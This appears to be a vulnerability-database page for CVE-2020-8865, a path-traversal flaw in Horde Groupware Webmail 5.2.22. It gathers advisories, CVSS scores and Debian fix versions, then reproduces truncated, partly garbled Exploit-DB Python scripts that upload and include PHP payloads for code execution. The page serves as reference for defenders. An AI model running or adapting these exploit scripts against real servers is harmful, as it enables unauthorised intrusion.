CVE-2020-8865
published 2020-03-23CVE-2020-8865: This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is…
PriorityP353medium6.3CVSS 3.1
AVNACLPRLUINSUCLILAL
EXPLOIT
EPSS
6.81%
93.2th percentile
This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within edit.php. When parsing the params[template] parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10469.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | php-horde-trean | < php-horde-trean 1.1.10-1 (bookworm) | php-horde-trean 1.1.10-1 (bookworm) |
| horde | groupware | — | — |
| horde | groupware_webmail_edition | — | — |
CVSS provenance
nvdv3.16.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
nvdv3.06.3MEDIUMCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
osv6.3MEDIUM
vendor_debian6.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-ggc2-fj6j-c7cc: This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5
ghsa_unreviewed·2022-05-24
CVE-2020-8865 [MEDIUM] CWE-22 GHSA-ggc2-fj6j-c7cc: This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5
This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within edit.php. When parsing the params[template] parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10469.
OSV
CVE-2020-8865: This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5
osv·2020-03-23·CVSS 6.3
CVE-2020-8865 [MEDIUM] CVE-2020-8865: This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5
This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within edit.php. When parsing the params[template] parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10469.
Debian
CVE-2020-8865: php-horde-trean - This vulnerability allows remote attackers to execute local PHP files on affecte...
vendor_debian·2020·CVSS 6.3
CVE-2020-8865 [MEDIUM] CVE-2020-8865: php-horde-trean - This vulnerability allows remote attackers to execute local PHP files on affecte...
This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within edit.php. When parsing the params[template] parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10469.
Scope: local
bookworm: resolved (fixed in 1.1.10-1)
bullseye: resolved (fixed in 1.1.10-1)
sid: resolved (fixed in 1.1.10-1)
No detection rules found.
Exploit-DB
Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
exploitdb·2020-03-11
CVE-2020-8866 Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
---
## exploit-phar-loading.py
#!/usr/bin/env python3
from horde import Horde
import requests
import subprocess
import sys
TEMP_DIR = '/tmp'
WWW_ROOT = '/var/www/html'
if len(sys.argv) ')
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]
source = '{}/{}.phar'.format(TEMP_DIR, filename)
destination = '{}/static/{}.php'.format(WWW_ROOT, filename) # destination (delete manually)
temp = 'temp.phar'
url = '{}/static/{}.php'.format(base_url, filename)
# log into the web application
horde = Horde(base_url, username, password)
# create a PHAR that performs a rename when loaded and runs the payload when executed
subprocess.run([
'php', 'create-renaming-phar.php'
Exploit-DB
Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
exploitdb·2020-03-11
CVE-2020-8866 Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
---
## exploit-inc-inclusion.py
#!/usr/bin/env python3
from horde import Horde
import subprocess
import sys
TEMP_DIR = '/tmp'
if len(sys.argv) ')
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]
# log into the web application
horde = Horde(base_url, username, password)
# upload (delete manually) and evaluate the .inc file
horde.upload_to_tmp('{}.inc'.format(filename), '<?php {} die();'.format(php_code))
horde.include_remote_inc_file('{}/{}'.format(TEMP_DIR, filename))
## exploit-inc-inclusion.py EOF
## horde.py
import re
import requests
class Horde():
def __init__(self, base_url, username, password):
self.base_url = base_url
self.username = use
No writeups or analysis indexed.
2020-03-23
Published